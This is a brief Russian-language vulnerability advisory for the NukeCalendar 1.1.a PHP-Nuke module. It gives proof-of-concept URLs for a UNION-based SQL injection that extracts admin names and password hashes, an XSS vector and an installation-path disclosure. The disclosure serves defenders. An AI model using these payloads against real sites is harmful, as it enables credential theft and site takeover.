Программа: NukeCalendar 1.1.а 

Несколько уязвимостей обнаружено в NukeCalendar. Удаленный пользователь может внедрить SQL команды и выполнить XSS нападение. Удаленный пользователь может также определить инсталляционный путь. 

1. SQL injection: 

http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=-1%20UNION%
20select%20null,aid,null,pwd,null,null,null

2. XSS 

http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=[xss code here]

3. Раскрытие инсталляционного пути: 

http://localhost/nuke71/modules.php?op=modload&name= Kalender&file=index&type=view&eid=foobar



Оставить мнение